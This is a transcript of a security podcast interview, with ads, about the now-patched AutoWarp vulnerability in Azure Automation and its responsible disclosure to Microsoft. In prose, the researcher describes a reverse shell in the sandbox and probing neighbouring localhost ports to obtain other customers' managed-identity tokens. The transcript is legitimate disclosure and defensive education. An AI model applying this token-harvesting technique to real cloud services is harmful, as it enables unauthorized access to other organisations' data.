CyberWire Daily - AutoWarp bug leads to Automation headaches. [Research Saturday]
Episode Date: May 21, 2022Yanir Tsarimi from Orca Security, joins Dave to discuss how researchers have discovered a critical Azure Automation service vulnerability called AutoWarp. The security flaw was discovered this past M...arch causing Yanir to leap into action announcing the issue to Microsoft who helped to swiftly resolve the cross-account vulnerability. The research shows how this serious flaw would allow attackers unauthorized access to other customer accounts and potentially full control over resources and data belonging to those accounts, as well as put multiple Fortune 500 companies and billions of dollars at risk. The research shares the crucial time line that the vulnerability was discovered as well as Microsofts response to the vulnerability. The research can be found here: AutoWarp: Critical Cross-Account Vulnerability in Microsoft Azure Automation Service Learn more about your ad choices. Visit megaphone.fm/adchoices
Transcript
Discussion (0)
You're listening to the Cyber Wire Network, powered by N2K. data products platform comes in. With Domo, you can channel AI and data into innovative uses that
deliver measurable impact. Secure AI agents connect, prepare, and automate your data workflows,
helping you gain insights, receive alerts, and act with ease through guided apps tailored to
your role. Data is hard. Domo is easy. Learn more at ai.domo.com.
That's ai.domo.com.
Hello, everyone, and welcome to the CyberWire's Research Saturday.
I'm Dave Bittner, and this is our weekly conversation with researchers and analysts
tracking down threats and vulnerabilities,
solving some of the hard problems of protecting ourselves in a rapidly evolving cyberspace.
Thanks for joining us.
I was looking for a new research target,
and I somehow randomly got to Azure Automation,
and it made my eyes pop up,
and I thought, okay, this might be interesting,
and I want to look further.
That's Yanir Surimi.
He's a cloud security researcher at Orca Security.
The research we're discussing today is titled
AutoWarp, Critical Cross-Account Vulnerability
in Microsoft Azure Automation Service.
And now, a message from our sponsor, Zscaler, the leader in cloud security.
Enterprises have spent billions of dollars on firewalls and VPNs,
yet breaches continue to rise by an 18% year-over-year increase in ransomware attacks
and a $75 million record payout in 2024.
These traditional security tools expand your attack surface with public-facing
IPs that are exploited by bad actors more easily than ever with AI tools. It's time to rethink your
security. Zscaler Zero Trust plus AI stops attackers by hiding your attack surface, making
apps and IPs invisible, eliminating lateral. Connecting users only to specific apps, not the entire network.
Continuously verifying every request based on identity and context.
Simplifying security management with AI-powered automation.
And detecting threats using AI to analyze over 500 billion daily transactions.
Hackers can't attack what they can't see.
Protect your organization with Zscaler Zero Trust and AI. Learn more at zscaler.com security.
So this is like how I got it.
How I got to it, it was really, really random.
Some may say it was like a stroke of luck,
like how it all went down.
But it was really like, it's my job.
I do the research and I got specifically to Azure Automation like in a random way.
Well, there is that old saying that luck favors the prepared mind.
So I suppose one way you were primed to notice something
that caught your attention, as you say.
So walk me through this.
What exactly was it that caught your eye?
So when I was looking at the automation service,
I saw that you can upload scripts
and run them inside the environment of Azure.
And I was like, okay, so let's see what I can do with it.
So I uploaded a simple Python script
and I started a reversal.
So I had a reversal inside the environment.
So I was just typing up commands and looking around
what processes are running inside, what files are there.
And I was looking around in the file system
and I remember that I've seen a strange directory in the C hard drive.
So I was looking at the directory and inside I saw a log file. So it was like
a folder that you don't usually see on like a standard Windows machine. So I was like
looking at the log and like reading it. It was pretty short, like just a few lines. And
I remember seeing like an HTTP URL inside the log file.
And I said, okay, there's an HTTP set up locally
because the URL was pointing to local host.
And it had like a weird port.
The port was 4008, something like that.
It was like a completely random number.
Like I didn't really understand
why would someone like choose this number specifically.
So it's like something that caught my eye.
So I wanted to understand
why is there a server
and why this port specifically.
I started with making requests
to the local server
just to see what would come up
and I got like errors and like forbidden.
So I just looked more inside the machine until I've seen that there is like DLL files that
those DLL files are the code of the sandbox.
Because when you run inside the automation environment, you are basically running inside a machine with other customers,
but you are supposed to be isolated from other customers.
So I took this code and I started looking into it
until I found I did a reverse engineering of the code
and I saw that that server was actually an interesting server
because you could actually make a request
and receive the token of your managed identity.
So what is the managed identity?
It's basically a token that allows you to access
all the resources in your Azure account.
So when you have this token, for example, if I want to use Azure Automation to create
a new virtual machine inside my Azure account, I can use this token and give it permissions
to create that virtual machine.
And when I can have this token and use it for other resources,
this could be interesting.
So I didn't really know if this would be interesting or not
because I only knew the basics at this point.
The only thing that mattered to me is that random number
that the software engineers chose for this port, for this server.
At this point, I mean, the token that you've gotten back is your token.
So am I correct there?
Yeah.
So I was using my own port.
It was like my own assigned server.
So the token was for my account.
I see.
So nothing terribly unusual there or raising any red flags when it comes to security of that.
So, yeah, it seemed like it should be happening.
Like, it seemed like a feature, not a bug.
But when I thought about it, like, after a few minutes, like, I started to think, okay, when I started a new automation job, I would see that this port in the log
file changed.
Like it was 40,008 and sometimes it was 40,020.
Like it was like around 40,000, but it changed.
Like each time I ran a new job, I got a different port.
So I said, okay, they are assigning like a random port. So I said, okay, they are assigning a random port. So I wanted to
know, it
seemed natural to me that they are trying
to create
some kind of isolation
because when I was researching that
server, I saw that they had some kind of
authentication in place and
security to prevent
unauthorized access to the server.
But the problem is, when I started scanning inside the machines, I see that other ports
are available and they answer to me just like my own server.
So I just started saying, okay, let's try to make the same request for the token.
But instead of using my own port,
I will try to use other ports around that range.
So I went from 40,000 and up to like,
I did try like 100 ports up,
and I started to receive tokens.
So I was like, when I saw the tokens,
I was like taken aback, like,
okay, what is going on here?
Is this what I think it is?
Yeah, it really caught me off guard.
I was like two hours into looking at the service
and I thought there's no way that something like this would be so easy.
I was taking the token and the thing with this token is
it's a JWT, JSON web token. So you can actually like
decrypt it in some way and like see what data is stored inside the token. What I did is I looked
at the data of the tokens I received and I've seen that they are attached to other customer
subscriptions. So I've seen like subscriptions of other companies and I've seen
names and all that kind of stuff. So I was like, okay, this is, this is an issue. Like this is
really something that shouldn't be, shouldn't be having. So I set up like, let's say a victim
account just to, to try to see if I can actually access another account through this token.
And it actually worked.
And I was even more surprised that it actually worked.
Against the Azure API, if you gave any permissions,
you could just use those permissions of other customers in their account.
So I was really, really surprised
and I was like holding my head like,
I can't believe this really, it was really this simple.
And I just, I don't have any mots to say like this.
It's something like feels like a bit bizarre or surreal,
something like this to happen.
Right, so at that point, what did you think? I mean, something like this to happen.
Right. So at that point, what did you think?
I mean, do you say to yourself, well, I need to get in touch with Microsoft about this?
Yeah. So this is like a standard procedure here. We do the security research, and the moment we find something that we think is a security issue,
we go straight ahead.
I wrote up the report to Microsoft the same day
and submitted it to them.
And they fixed it within four days, I think.
And what was the fix?
So the issue was that you could access,
you could just ask for the tokens, right?
So you had to place some kind of authentication in place
or block it entirely, like the access to the server.
So Microsoft chose to mitigate this
by requiring a special secret token
that only the customer itself should know.
So when you start up a new automation job,
in your environment variables,
you get this spatial token. And when you request the managed identity token from the server,
you need to send them this token that you have in your environment variables.
I see. Now, one of the things you point out in the research you published online here is that
Microsoft was quite responsive to you reaching out.
They were a good partner here.
Yeah, it was a really good experience with Microsoft.
They responded very, very quickly to all my emails
and they were really appreciative and cooperative
in fixing this problem.
It was really a positive experience.
in fixing this problem.
It was really a positive experience.
I think that this is the thing that makes me,
as a security researcher, want to keep going and keep finding more security vulnerabilities
and report them to vendors who treat me
with respect and cooperation.
It also strikes me that part of what allowed you to get as far as you did with this
was that there were several steps along the way
where a lot of people would have given up
or moved on to something else,
and you hung in there and kept digging.
Yeah, this is actually an interesting part
about security research,
is that you can, like, do research on one thing for months and have nothing.
But as long as you keep learning about your target and you just be persistent, you will find something.
The farther you go and the deeper you go, you will find issues that other people who gave up will
not find.
There's no other way to go about it.
You have to go the furthest to find the most interesting and severe vulnerabilities.
In this case, it all happened quite fast.
But in other security research that I did, it usually took a lot longer to get to security problems like this.
And are you satisfied that this has been properly mitigated?
Yes, I think Microsoft cares about those issues.
And I think we have a very good reason to keep going and look for more of those.
What are your recommendations for folks to protect themselves against these sorts of things?
I suppose there's no evidence that this itself was being exploited,
but it strikes me as one of those things that someone using Microsoft Azure, for example,
they wouldn't have known that this was an issue.
I can speak specifically in this case.
I think the concept of list privilege would be really helpful here.
If you used Azure Automation and you assigned the minimal permissions that you actually need,
or even don't assign any permissions
at all if you don't need them so you will be at significantly less risk compared to someone who
just gave all the permissions to diminish the identity like the concept of least privilege
really shows that it matters like what you do and the decisions you make, even as a customer,
it can change how severe the issue can expose you.
Our thanks to Yanir Sarimi from Orca Security for joining us.
The research is titled AutoWarp, Critical Cross-Account Vulnerability in Microsoft Azure Automation Service.
We'll have a link in the show notes.
Cyber threats are evolving every second, and staying ahead is more than just a challenge.
It's a necessity.
That's why we're thrilled to partner with ThreatLocker, a cybersecurity solution trusted by businesses worldwide.
ThreatLocker is a full suite of solutions designed to give you total control, stopping unauthorized applications, securing sensitive data, and ensuring your organization runs smoothly and securely.
Visit ThreatLocker.com today to see how a're co-building the next generation of cybersecurity teams and technologies.
Our amazing Cyber Wire team is Rachel Gelfand, Liz Ervin, Elliot Peltzman, Trey Hester, Brandon Karpf, Eliana White, Puru Prakash, Justin Sabey, Tim Nodar, Joe Kerrigan, Carol Terrio, Ben Yellen, Nick Vilecki, Gina Johnson, Bennett Moe, Chris Russell, John
Petrick, Jennifer Iben, Rick Howard, Peter Kilby, and I'm Dave Bittner. Thanks for listening. We'll
see you back here next week.